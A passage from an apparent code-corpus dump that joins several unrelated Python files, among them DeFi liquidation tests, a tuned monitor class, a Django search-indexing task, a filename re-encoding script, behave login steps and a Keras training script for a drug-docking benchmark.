assert(liquidations[0]['protocol'] == "Aave")
assert(liquidations[0]['chain'] == "Ethereum")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(liquidations[0]['amount_principal'] > 0)
assert(liquidations[0]['amount_collateral'] > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_aave_2_eth_user():
aave = Lending(protocol="Aave", chain="Ethereum", version=2)
liquidations = aave.get_data_from_date_range(
'21/04/2021 05:20:01', '24/04/2021 06:22:01', "liquidation", "0xcfd873f19a86b84cfc4916e8623f2486dc83d792")
for liquidation in liquidations:
assert(liquidation['user'] ==
"0xcfd873f19a86b84cfc4916e8623f2486dc83d792")
def test_liquidation_aave_2_polygon():
aave = Lending(protocol="Aave", chain="Polygon", version=2)
liquidations = aave.get_data_from_date_range(
'10/05/2021 00:00:01', '11/05/2021 00:01:10', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Aave")
assert(liquidations[0]['chain'] == "Polygon")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(liquidations[0]['amount_principal'] > 0)
assert(liquidations[0]['amount_collateral'] > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_aave_2_avalanche():
aave = Lending(protocol="Aave", chain="Avalanche", version=2)
liquidations = aave.get_data_from_date_range(
'10/10/2021 00:00:01', '18/10/2021 00:01:10', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Aave")
assert(liquidations[0]['chain'] == "Avalanche")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(liquidations[0]['amount_principal'] > 0)
assert(liquidations[0]['amount_collateral'] > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_aave_2_polygon_user():
aave = Lending(protocol="Aave", chain="Polygon", version=2)
liquidations = aave.get_data_from_date_range(
'10/05/2021 00:00:01', '14/05/2021 00:01:10', "liquidation", "0x573bcd1d82b5bb799c5340e8f7077a4676f95097")
for liquidation in liquidations:
assert(liquidation['user'] ==
"0x573bcd1d82b5bb799c5340e8f7077a4676f95097")
def test_liquidation_compound_2_eth():
compound = Lending(protocol="Compound", chain="Ethereum", version=2)
liquidations = compound.get_data_from_date_range(
'09/05/2021 00:00:01', '11/05/2021 00:01:10', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Compound")
assert(liquidations[0]['chain'] == "Ethereum")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(float(liquidations[0]['amount_principal']) > 0)
assert(float(liquidations[0]['amount_collateral']) > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_compound_2_eth_user():
compound = Lending(protocol="Compound", chain="Ethereum", version=2)
liquidations = compound.get_data_from_date_range(
'09/05/2021 00:00:01', '14/05/2021 00:01:10', "liquidation", "0xa507b355d6288a232ac692dad36af80ff1eba062")
for liquidation in liquidations:
assert(liquidation['user'] ==
"0xa507b355d6288a232ac692dad36af80ff1eba062")
def test_liquidation_cream_2_eth():
cream = Lending(protocol="Cream", chain="Ethereum", version=2)
liquidations = cream.get_data_from_date_range(
'01/05/2021 00:00:01', '12/05/2021 11:54:10', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Cream")
assert(liquidations[0]['chain'] == "Ethereum")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(float(liquidations[0]['amount_principal']) > 0)
assert(float(liquidations[0]['amount_collateral']) > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_cream_2_polygon():
cream = Lending(protocol="Cream", chain="Polygon", version=2)
liquidations = cream.get_data_from_date_range(
'25/09/2021 00:00:01', '26/09/2021 11:54:10', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Cream")
assert(liquidations[0]['chain'] == "Polygon")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(float(liquidations[0]['amount_principal']) > 0)
assert(float(liquidations[0]['amount_collateral']) > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_cream_2_eth_user():
cream = Lending(protocol="Cream", chain="Ethereum", version=2)
liquidations = cream.get_data_from_date_range(
'01/05/2021 00:00:01', '14/05/2021 11:54:10', "liquidation","0xcb774b92587f1c19e960eaeb6902d97e2cabd6be")
for liquidation in liquidations:
assert(liquidation['user'] ==
"0xcb774b92587f1c19e960eaeb6902d97e2cabd6be")
def test_liquidation_cream_2_bsc():
cream = Lending(protocol="Cream", chain="bsc", version=2)
liquidations = cream.get_data_from_date_range(
'01/05/2021 00:00:01', '12/05/2021 11:54:10', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Cream")
assert(liquidations[0]['chain'] == "bsc")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(float(liquidations[0]['amount_principal']) > 0)
assert(float(liquidations[0]['amount_collateral']) > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_cream_2_bsc_user():
cream = Lending(protocol="Cream", chain="bsc", version=2)
liquidations = cream.get_data_from_date_range(
'01/05/2021 00:00:01', '14/05/2021 11:54:10', "liquidation", "0x0825602e9d177b51af7d79acbdc68a746bc41ce4")
for liquidation in liquidations:
assert(liquidation['user'] ==
"0x0825602e9d177b51af7d79acbdc68a746bc41ce4")
|
457460
|
from utils import registry
DATASETS = registry.Registry('dataset')
def build_dataset_from_cfg(cfg, default_args = None):
"""
Build a dataset, defined by `dataset_name`.
Args:
        cfg (eDICT): config describing the dataset to build.
        default_args (dict, optional): extra defaults passed through to the registry build call.
Returns:
Dataset: a constructed dataset specified by dataset_name.
"""
return DATASETS.build(cfg, default_args = default_args)
|
457543
|
import tuned.logs
log = tuned.logs.get()
__all__ = ["Monitor"]
class Monitor(object):
"""
Base class for all monitors.
Monitors provide data about the running system to Plugin objects, which use the data
to tune system parameters.
    The following methods require reimplementation in subclasses:
- _init_available_devices(cls)
- update(cls)
"""
# class properties
@classmethod
def _init_class(cls):
cls._class_initialized = False
cls._instances = set()
cls._available_devices = set()
cls._updating_devices = set()
cls._load = {}
cls._init_available_devices()
assert isinstance(cls._available_devices, set)
cls._class_initialized = True
log.debug("available devices: %s" % ", ".join(cls._available_devices))
@classmethod
def _init_available_devices(cls):
raise NotImplementedError()
@classmethod
def _update_available_devices(cls):
cls._init_available_devices()
log.debug("available devices updated to: %s"
% ", ".join(cls._available_devices))
@classmethod
def get_available_devices(cls):
return cls._available_devices
@classmethod
def update(cls):
raise NotImplementedError()
@classmethod
def _register_instance(cls, instance):
cls._instances.add(instance)
@classmethod
def _deregister_instance(cls, instance):
cls._instances.remove(instance)
@classmethod
def _refresh_updating_devices(cls):
new_updating = set()
for instance in cls._instances:
new_updating |= instance.devices
cls._updating_devices.clear()
cls._updating_devices.update(new_updating)
@classmethod
def instances(cls):
return cls._instances
# instance properties
def __init__(self, devices = None):
if not hasattr(self, "_class_initialized"):
self._init_class()
assert hasattr(self, "_class_initialized")
self._register_instance(self)
if devices is not None:
self.devices = devices
else:
self.devices = self.get_available_devices()
self.update()
def __del__(self):
try:
self.cleanup()
except:
pass
def cleanup(self):
self._deregister_instance(self)
self._refresh_updating_devices()
@property
def devices(self):
return self._devices
@devices.setter
def devices(self, value):
new_devices = self._available_devices & set(value)
self._devices = new_devices
self._refresh_updating_devices()
def add_device(self, device):
assert (isinstance(device,str) or isinstance(device,unicode))
self._update_available_devices()
if device in self._available_devices:
self._devices.add(device)
self._updating_devices.add(device)
def remove_device(self, device):
assert (isinstance(device,str) or isinstance(device,unicode))
if device in self._devices:
self._devices.remove(device)
self._updating_devices.remove(device)
def get_load(self):
        return {dev: load for dev, load in self._load.items() if dev in self._devices}
def get_device_load(self, device):
return self._load.get(device, None)
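# A minimal sketch of a concrete monitor (class name and device names are made up, only
# to illustrate the two methods that subclasses must reimplement):
#
#   class ExampleMonitor(Monitor):
#       @classmethod
#       def _init_available_devices(cls):
#           cls._available_devices = set(["dev0", "dev1"])
#
#       @classmethod
#       def update(cls):
#           for device in cls._updating_devices:
#               cls._load[device] = 0.0  # replace with a real load reading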
|
457579
|
import warnings
from typing import Dict, Type
from ..core.builder import DatasetBuilder
from ...serializers.event import EventDataSerializer, StatsBombSerializer
# 3749133 / 38412
class Statsbomb(DatasetBuilder):
def get_dataset_urls(self, **kwargs) -> Dict[str, str]:
warnings.warn(
"\n\nYou are about to use StatsBomb public data."
"\nBy using this data, you are agreeing to the user agreement. "
"\nThe user agreement can be found here: https://github.com/statsbomb/open-data/blob/master/LICENSE.pdf"
"\n"
)
match_id = kwargs.get("match_id", "15946")
return {
"event_data": f"https://raw.githubusercontent.com/statsbomb/open-data/master/data/events/{match_id}.json",
"lineup_data": f"https://raw.githubusercontent.com/statsbomb/open-data/master/data/lineups/{match_id}.json",
}
def get_serializer_cls(self) -> Type[EventDataSerializer]:
return StatsBombSerializer
|
457587
|
import numpy as np
import numpy.random as rnd
from libtlda.rba import RobustBiasAwareClassifier
def test_init():
"""Test for object type."""
clf = RobustBiasAwareClassifier()
assert type(clf) == RobustBiasAwareClassifier
assert not clf.is_trained
def test_fit():
"""Test for fitting the model."""
X = rnd.randn(10, 2)
y = np.hstack((np.zeros((5,)), np.ones((5,))))
Z = rnd.randn(10, 2) + 1
clf = RobustBiasAwareClassifier()
clf.fit(X, y, Z)
assert clf.is_trained
def test_predict():
"""Test for making predictions."""
X = rnd.randn(10, 2)
y = np.hstack((np.zeros((5,)), np.ones((5,))))
Z = rnd.randn(10, 2) + 1
clf = RobustBiasAwareClassifier()
clf.fit(X, y, Z)
u_pred = clf.predict(Z)
labels = np.unique(y)
assert len(np.setdiff1d(np.unique(u_pred), labels)) == 0
|
457589
|
myvar = {1:10,2:20}
class myclass():
def __init__(self):
myvar[1]=100
print myvar
self.printvar()
def printvar(self):
print myvar
k = myclass()
|
457625
|
import logging
from django_elasticsearch_dsl.registries import registry
from django.apps import apps
from froide.celery import app as celery_app
logger = logging.getLogger(__name__)
def get_instance(model_name, pk):
model = apps.get_model(model_name)
try:
return model._default_manager.get(pk=pk)
except model.DoesNotExist:
return None
@celery_app.task
def search_instance_save(model_name, pk):
instance = get_instance(model_name, pk)
if instance is None:
return
try:
registry.update(instance)
registry.update_related(instance)
except Exception as e:
logger.exception(e)
@celery_app.task
def search_instance_pre_delete(model_name, pk):
instance = get_instance(model_name, pk)
if instance is None:
return
try:
registry.delete_related(instance)
except Exception as e:
logger.exception(e)
@celery_app.task
def search_instance_delete(model_name, pk):
if pk is None:
return
model = apps.get_model(model_name)
instance = model()
instance.pk = pk
instance.id = pk
registry.delete(instance, raise_on_error=False)
|
457626
|
import os, urllib, sys, getopt
class Renamer:
input_encoding = ""
output_encoding = ""
path = ""
is_url = False
def __init__(self, input, output, path, is_url):
self.input_encoding = input
self.output_encoding = output
self.path = path
self.is_url = is_url
def start(self):
self.rename_dir(self.path)
def rename(self, root, path):
try:
if self.is_url:
new = urllib.unquote(path).decode(self.input_encoding).encode(self.output_encoding)
else:
new = path.decode(self.input_encoding).encode(self.output_encoding)
os.rename(os.path.join(root, path), os.path.join(root, new))
except:
pass
    def rename_dir(self, path):
        # walk bottom-up so directories are renamed only after their contents
        for root, dirs, files in os.walk(path, topdown=False):
            for f in files:
                self.rename(root, f)
            for d in dirs:
                self.rename(root, d)
def usage():
print '''This program can change encode of files or directories.
Usage: rename.exe [OPTION]...
Options:
-h, --help this document.
-i, --input-encoding=ENC set original encoding, default is UTF-8.
-o, --output-encoding=ENC set output encoding, default is GBK.
-p, --path=PATH choose the path which to process.
-u, --is-url whether as a URL
'''
def main(argv):
input_encoding = "utf-8"
output_encoding = "gbk"
path = ""
    is_url = False
try:
opts, args = getopt.getopt(argv, "hi:o:p:u", ["help", "input-encoding=", "output-encoding=", "path=", "is-url"])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
elif opt in ("-i", "--input-encoding"):
input_encoding = arg
elif opt in ("-o", "--output-encoding"):
output_encoding = arg
elif opt in ("-p", "--path"):
path = arg
elif opt in ("-u", "--is-url"):
is_url = True
rn = Renamer(input_encoding, output_encoding, path, is_url)
rn.start()
if __name__ == '__main__':
main(sys.argv[1:])
|
457736
|
from behave import given, when, then
from hamcrest import *
empty_database = ''
one_user_registered = 'alice <PASSWORD>'
URL = 'http://localhost:8080/demo/library.html'
DEFAULT_USERNAME = 'alice'
DEFAULT_PASSWORD = '<PASSWORD>'
@given('I am not registered')
def step_impl(context):
pass
@when('I register with a valid username and password')
def step_impl(context):
__register_user(context, DEFAULT_USERNAME, DEFAULT_PASSWORD)
pass
@then('it indicates I am successfully registered')
def step_impl(context):
result = context.driver.find_element_by_id('result')
assert_that(result.text, contains_string('successfully registered: true'))
@given('I am registered as a user')
def step_impl(context):
context.username = DEFAULT_USERNAME
    context.password = DEFAULT_PASSWORD
__register_user(context, context.username, context.password)
pass
@when('I login')
def step_impl(context):
__login_user(context, context.username, context.password)
pass
@then('the system allows secure access')
def step_impl(context):
result = context.driver.find_element_by_id('result')
assert_that(result.text, contains_string('access granted'))
def __register_user(context, username_text, password_text):
driver = context.driver
driver.get(URL)
username = driver.find_element_by_id("register_username")
username.clear()
username.send_keys(username_text)
password = driver.find_element_by_id("register_password")
password.clear()
password.send_keys(password_text)
submit_button = driver.find_element_by_id("register_submit")
submit_button.click()
def __login_user(context, username_text, password_text):
driver = context.driver
driver.get(URL)
username = driver.find_element_by_id("login_username")
username.clear()
username.send_keys(username_text)
password = driver.find_element_by_id("login_password")
password.clear()
    password.send_keys(password_text)
submit_button = driver.find_element_by_id("login_submit")
submit_button.click()
|
457810
|
from __future__ import print_function
import numpy as np
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import h5py
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Input, Dense, Dropout
from tensorflow.keras.models import Model, model_from_json, model_from_yaml
from tensorflow.keras.callbacks import (
Callback,
ModelCheckpoint,
CSVLogger,
ReduceLROnPlateau,
EarlyStopping,
)
from sklearn.metrics import (
r2_score,
roc_auc_score,
accuracy_score,
)
from scipy.stats import pearsonr
import sys
import adrp
import candle
np.set_printoptions(precision=4)
def r2(y_true, y_pred):
SS_res = K.sum(K.square(y_true - y_pred))
SS_tot = K.sum(K.square(y_true - K.mean(y_true)))
return 1 - SS_res / (SS_tot + K.epsilon())
def tf_auc(y_true, y_pred):
auc = tf.metrics.auc(y_true, y_pred)[1]
K.get_session().run(tf.local_variables_initializer())
return auc
# from sklearn.metrics import roc_auc_score
# import tensorflow as tf
def auroc(y_true, y_pred):
score = tf.py_func(
lambda y_true, y_pred: roc_auc_score(
y_true, y_pred, average="macro", sample_weight=None
).astype("float32"),
[y_true, y_pred],
"float32",
stateful=False,
name="sklearnAUC",
)
return score
# def covariance(x, y):
# return K.mean(x * y) - K.mean(x) * K.mean(y)
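# Pearson correlation computed from covariances:
# corr = cov(y_true, y_pred) / sqrt(var(y_true) * var(y_pred))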
def corr(y_true, y_pred):
cov = candle.covariance(y_true, y_pred)
var1 = candle.covariance(y_true, y_true)
var2 = candle.covariance(y_pred, y_pred)
return cov / (K.sqrt(var1 * var2) + K.epsilon())
# def xent(y_true, y_pred):
# return binary_crossentropy(y_true, y_pred)
# def mse(y_true, y_pred):
# return mean_squared_error(y_true, y_pred)
class MetricHistory(Callback):
def on_epoch_begin(self, epoch, logs=None):
print("\n")
def on_epoch_end(self, epoch, logs=None):
y_pred = self.model.predict(self.validation_data[0])
# y_true = self.validation_data[1]
sample_weight = self.validation_data[2]
r2 = r2_score(self.validation_data[1], y_pred, sample_weight=sample_weight)
corr, _ = pearsonr(self.validation_data[1].flatten(), y_pred.flatten())
print("\nval_r2:", r2)
print(y_pred.shape)
print("\nval_corr:", corr, "val_r2:", r2)
print("\n")
class LoggingCallback(Callback):
def __init__(self, print_fcn=print):
Callback.__init__(self)
self.print_fcn = print_fcn
def on_epoch_end(self, epoch, logs={}):
msg = "[Epoch: %i] %s" % (
epoch,
", ".join("%s: %f" % (k, v) for k, v in sorted(logs.items())),
)
self.print_fcn(msg)
def build_type_classifier(x_train, y_train, x_test, y_test):
y_train = np.argmax(y_train, axis=1)
y_test = np.argmax(y_test, axis=1)
from xgboost import XGBClassifier
clf = XGBClassifier(max_depth=6, n_estimators=100)
clf.fit(
x_train, y_train, eval_set=[(x_train, y_train), (x_test, y_test)], verbose=False
)
y_pred = clf.predict(x_test)
acc = accuracy_score(y_test, y_pred)
print(acc)
return clf
def initialize_parameters(default_model="adrp_default_model.txt"):
# Build benchmark object
adrpBmk = adrp.BenchmarkAdrp(
adrp.file_path,
default_model,
"keras",
prog="adrp_baseline",
desc="Multi-task (DNN) for data extraction from clinical reports - Pilot 3 Benchmark 1",
)
# Initialize parameters
gParameters = candle.finalize_parameters(adrpBmk)
# adrp.logger.info('Params: {}'.format(gParameters))
return gParameters
def save_cache(
cache_file, x_train, y_train, x_val, y_val, x_test, y_test, x_labels, y_labels
):
with h5py.File(cache_file, "w") as hf:
hf.create_dataset("x_train", data=x_train)
hf.create_dataset("y_train", data=y_train)
hf.create_dataset("x_val", data=x_val)
hf.create_dataset("y_val", data=y_val)
hf.create_dataset("x_test", data=x_test)
hf.create_dataset("y_test", data=y_test)
hf.create_dataset(
"x_labels",
(len(x_labels), 1),
"S100",
data=[x.encode("ascii", "ignore") for x in x_labels],
)
hf.create_dataset(
"y_labels",
(len(y_labels), 1),
"S100",
data=[x.encode("ascii", "ignore") for x in y_labels],
)
def load_cache(cache_file):
with h5py.File(cache_file, "r") as hf:
x_train = hf["x_train"][:]
y_train = hf["y_train"][:]
x_val = hf["x_val"][:]
y_val = hf["y_val"][:]
x_test = hf["x_test"][:]
y_test = hf["y_test"][:]
x_labels = [x[0].decode("unicode_escape") for x in hf["x_labels"][:]]
y_labels = [x[0].decode("unicode_escape") for x in hf["y_labels"][:]]
return x_train, y_train, x_val, y_val, x_test, y_test, x_labels, y_labels
def run_inference(params):
if params['saved_model'] is not None:
model_file = params['saved_model']
else:
model_file = adrp.get_model(params)
print('Loading model from ', model_file)
# switch based on model type specified
if model_file.endswith('.json'):
# load json model + weights
base_model_file = model_file.split('.json')
# load json and create model
json_file = open(model_file, 'r')
loaded_model = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model)
# load weights into new model
loaded_model.load_weights(base_model_file[0] + '.h5')
print("Loaded json model from disk")
elif model_file.endswith('.yaml'):
# load yaml model + weights
base_model_file = model_file.split('.yaml')
# load yaml and create model
yaml_file = open(model_file, 'r')
loaded_model = yaml_file.read()
yaml_file.close()
loaded_model = model_from_yaml(loaded_model)
# load weights into new model
loaded_model.load_weights(base_model_file[0] + '.h5')
print("Loaded yaml model from disk")
elif model_file.endswith('.h5'):
loaded_model = tf.keras.models.load_model(model_file, compile=False)
print("Loaded h5 model from disk")
else:
sys.exit("Model format should be one of json, yaml or h5")
# compile separately to get custom functions as needed
loaded_model.compile(optimizer=params['optimizer'], loss=params['loss'], metrics=['mae', r2])
# use same data as training
seed = params['rng_seed']
X_train, Y_train, X_test, Y_test, PS, count_array = adrp.load_data(params, seed)
print("X_train shape:", X_train.shape)
print("X_test shape:", X_test.shape)
print("Y_train shape:", Y_train.shape)
print("Y_test shape:", Y_test.shape)
score_train = loaded_model.evaluate(X_train, Y_train, verbose=0)
print("Training set loss:", score_train[0])
print("Training set mae:", score_train[1])
score_test = loaded_model.evaluate(X_test, Y_test, verbose=0)
print("Validation set loss:", score_test[0])
print("Validation set mae:", score_test[1])
def run(params):
args = candle.ArgumentStruct(**params)
seed = args.rng_seed
candle.set_seed(seed)
# Construct extension to save model
# ext = adrp.extension_from_parameters(params, ".keras")
# params['save_path'] = './'+params['base_name']+'/'
# candle.verify_path(params["save_path"])
# prefix = "{}{}".format(params["save_path"], ext)
prefix = "{}".format(params["save_path"])
logfile = params["logfile"] if params["logfile"] else prefix + "TEST.log"
candle.set_up_logger(logfile, adrp.logger, params["verbose"])
adrp.logger.info("Params: {}".format(params))
# Get default parameters for initialization and optimizer functions
keras_defaults = candle.keras_default_config()
##
X_train, Y_train, X_test, Y_test, PS, count_array = adrp.load_data(params, seed)
print("X_train shape:", X_train.shape)
print("X_test shape:", X_test.shape)
print("Y_train shape:", Y_train.shape)
print("Y_test shape:", Y_test.shape)
print("Y_test:")
print(Y_test)
# Initialize weights and learning rule
initializer_weights = candle.build_initializer(
params["initialization"], keras_defaults, seed
)
initializer_bias = candle.build_initializer("constant", keras_defaults, 0.0)
activation = params["activation"]
out_activation = params["out_activation"]
# TODO: set output_dim
output_dim = 1
# TODO: Use dense_layers for creating inputs/outputs
dense_layers = params["dense"]
inputs = Input(shape=(PS,))
if dense_layers is not None:
if type(dense_layers) != list:
dense_layers = list(dense_layers)
for i, l in enumerate(dense_layers):
if i == 0:
x = Dense(
l,
activation=activation,
kernel_initializer=initializer_weights,
bias_initializer=initializer_bias,
)(inputs)
else:
x = Dense(
l,
activation=activation,
kernel_initializer=initializer_weights,
bias_initializer=initializer_bias,
)(x)
if params["dropout"]:
x = Dropout(params["dropout"])(x)
output = Dense(
output_dim,
activation=out_activation,
kernel_initializer=initializer_weights,
bias_initializer=initializer_bias,
)(x)
else:
output = Dense(
output_dim,
activation=out_activation,
kernel_initializer=initializer_weights,
bias_initializer=initializer_bias,
)(inputs)
model = Model(inputs=inputs, outputs=output)
model.summary()
kerasDefaults = candle.keras_default_config()
if params["momentum"]:
kerasDefaults["momentum_sgd"] = params["momentum"]
optimizer = candle.build_optimizer(
params["optimizer"], params["learning_rate"], kerasDefaults
)
model.compile(
loss=params["loss"], optimizer=optimizer, metrics=["mae", r2],
)
# set up a bunch of callbacks to do work during model training..
checkpointer = ModelCheckpoint(
filepath=params["save_path"] + "agg_adrp.autosave.model.h5",
verbose=1,
save_weights_only=False,
save_best_only=True
)
csv_logger = CSVLogger(params["save_path"] + "agg_adrp.training.log")
# min_lr = params['learning_rate']*params['reduce_ratio']
min_lr = 0.000000001
reduce_lr = ReduceLROnPlateau(
monitor="val_loss",
factor=0.75,
patience=params['reduce_patience'],
mode="auto",
verbose=1,
epsilon=0.0001,
cooldown=3,
min_lr=min_lr
)
early_stop = EarlyStopping(monitor="val_loss",
patience=params['early_patience'],
verbose=1,
mode="auto")
# count_array = np.random.random_integers(0, 10000, 20)
# print(count_array)
# history = parallel_model.fit(X_train, Y_train,
epochs = params["epochs"]
batch_size = params["batch_size"]
timeout_monitor = candle.TerminateOnTimeOut(params['timeout'])
if (params['use_sample_weight']):
if (params['sample_weight_type'] == 'linear'):
train_weight = np.array(Y_train.values.tolist())
test_weight = np.array(Y_test.values.tolist())
print("Linear score weighting")
elif (params['sample_weight_type'] == 'quadratic'):
train_weight = np.square(np.array(Y_train.values.tolist()))
test_weight = np.square(np.array(Y_test.values.tolist()))
print("Quadratic score weighting")
elif (params['sample_weight_type'] == 'inverse_samples'):
train_score = np.array(Y_train.values.tolist())
test_score = np.array(Y_test.values.tolist())
train_bin = train_score.astype(int)
test_bin = test_score.astype(int)
train_count = count_array[train_bin].astype(float)
test_count = count_array[test_bin].astype(float)
train_weight = 1. / (train_count + 1.0)
test_weight = 1. / (test_count + 1.0)
print("Inverse sample weighting")
print("Test score, bin, count, weight:")
print(test_score[:10, ])
print(test_bin[:10, ])
print(test_count[:10, ])
elif (params['sample_weight_type'] == 'inverse_samples_sqrt'):
train_score = np.array(Y_train.values.tolist())
test_score = np.array(Y_test.values.tolist())
train_bin = train_score.astype(int)
test_bin = test_score.astype(int)
train_count = count_array[train_bin].astype(float)
test_count = count_array[test_bin].astype(float)
train_weight = 1. / np.sqrt(train_count + 1.0)
test_weight = 1. / np.sqrt(test_count + 1.0)
print("Inverse sqrt sample weighting")
print("Test score, bin, count, weight:")
print(test_score[:10, ])
print(test_bin[:10, ])
print(test_count[:10, ])
else:
train_weight = np.ones(shape=(len(Y_train),))
test_weight = np.ones(shape=(len(Y_test),))
print("Test weight:")
print(test_weight[:10, ])
print("calling model.fit with epochs={}".format(epochs))
history = model.fit(
X_train,
Y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
sample_weight=train_weight,
validation_data=(X_test, Y_test, test_weight),
callbacks=[checkpointer, timeout_monitor, csv_logger, reduce_lr, early_stop],
)
print("Reloading saved best model")
model.load_weights(params['save_path'] + "agg_adrp.autosave.model.h5")
score = model.evaluate(X_test, Y_test, verbose=0)
print(score)
print(history.history.keys())
# see big fuction below, creates plots etc.
# TODO: Break post_process into multiple functions
# post_process(params, X_train, X_test, Y_test, score, history, model)
adrp.logger.handlers = []
return history
def post_process(params, X_train, X_test, Y_test, score, history, model):
save_path = params["save_path"]
print("saving to path: ", save_path)
# summarize history for MAE
plt.plot(history.history["mae"])
plt.plot(history.history["val_mae"])
plt.title("Model Mean Absolute Error")
plt.ylabel("mae")
plt.xlabel("epoch")
plt.legend(["train", "test"], loc="upper left")
plt.savefig(save_path + "agg_adrp.mae.png", bbox_inches="tight")
plt.savefig(save_path + "agg_adrp.mae.pdf", bbox_inches="tight")
plt.close()
# summarize history for loss
plt.plot(history.history["loss"])
plt.plot(history.history["val_loss"])
plt.title("Model Loss")
plt.ylabel("loss")
plt.xlabel("epoch")
plt.legend(["train", "test"], loc="upper left")
plt.savefig(save_path + "agg_adrp.loss.png", bbox_inches="tight")
plt.savefig(save_path + "agg_adrp.loss.pdf", bbox_inches="tight")
plt.close()
print("Test val_loss:", score[0])
print("Test val_mae:", score[1])
# serialize model to JSON
model_json = model.to_json()
with open(save_path + "agg_adrp.model.json", "w") as json_file:
json_file.write(model_json)
# serialize model to YAML
model_yaml = model.to_yaml()
with open(save_path + "agg_adrp.model.yaml", "w") as yaml_file:
yaml_file.write(model_yaml)
# serialize weights to HDF5
model.save_weights(save_path + "agg_adrp.model.h5")
print("Saved model to disk")
# load json and create model
json_file = open(save_path + "agg_adrp.model.json", "r")
loaded_model_json = json_file.read()
json_file.close()
loaded_model_json = model_from_json(loaded_model_json)
# load yaml and create model
yaml_file = open(save_path + "agg_adrp.model.yaml", "r")
loaded_model_yaml = yaml_file.read()
yaml_file.close()
loaded_model_yaml = model_from_yaml(loaded_model_yaml)
# load weights into new model
loaded_model_json.load_weights(save_path + "agg_adrp.model.h5")
print("Loaded json model from disk")
# evaluate json loaded model on test data
loaded_model_json.compile(optimizer=params['optimizer'], loss=params['loss'], metrics=['mae', r2])
score_json = loaded_model_json.evaluate(X_test, Y_test, verbose=0)
print("json Validation loss:", score_json[0])
print("json Validation mae:", score_json[1])
print("json %s: %.2f%%" % (loaded_model_json.metrics_names[1], score_json[1] * 100))
# load weights into new model
loaded_model_yaml.load_weights(save_path + "agg_adrp.model.h5")
print("Loaded yaml model from disk")
# evaluate loaded model on test data
loaded_model_yaml.compile(optimizer=params['optimizer'], loss=params['loss'], metrics=['mae', r2])
score_yaml = loaded_model_yaml.evaluate(X_test, Y_test, verbose=0)
print("yaml Validation loss:", score_yaml[0])
print("yaml Validation mae:", score_yaml[1])
print("yaml %s: %.2f%%" % (loaded_model_yaml.metrics_names[1], score_yaml[1] * 100))
# predict using loaded yaml model on test and training data
predict_yaml_train = loaded_model_yaml.predict(X_train)
predict_yaml_test = loaded_model_yaml.predict(X_test)
print("Yaml_train_shape:", predict_yaml_train.shape)
print("Yaml_test_shape:", predict_yaml_test.shape)
predict_yaml_train_classes = np.argmax(predict_yaml_train, axis=1)
predict_yaml_test_classes = np.argmax(predict_yaml_test, axis=1)
np.savetxt(
save_path + "predict_yaml_train.csv",
predict_yaml_train,
delimiter=",",
fmt="%.3f",
)
np.savetxt(
save_path + "predict_yaml_test.csv",
predict_yaml_test,
delimiter=",",
fmt="%.3f",
)
np.savetxt(
save_path + "predict_yaml_train_classes.csv",
predict_yaml_train_classes,
delimiter=",",
fmt="%d",
)
np.savetxt(
save_path + "predict_yaml_test_classes.csv",
predict_yaml_test_classes,
delimiter=",",
fmt="%d",
)
def main():
params = initialize_parameters()
if params['infer'] is True:
run_inference(params)
else:
run(params)
if __name__ == "__main__":
main()
if K.backend() == "tensorflow":
K.clear_session()
|
457837
|
from typing import Iterable, Callable, TypeVar
from .config import CacheType
from .foreach_recipe import ForeachRecipe
from .recipe import Recipe
R = TypeVar("R") # The return type of the bound function
def recipe(ingredients: Iterable[Recipe] = (), transient: bool = False, cache: CacheType = CacheType.Auto) -> \
Callable[[Callable[..., R]], Recipe[R]]:
"""
Convert a function into an alkymi Recipe to enable caching and conditional evaluation
:param ingredients: The dependencies of this Recipe - the outputs of these Recipes will be provided as arguments to
the bound function when called
:param transient: Whether to always (re)evaluate the created Recipe
:param cache: The type of caching to use for this Recipe
:return: A callable that will yield the Recipe created from the bound function
"""
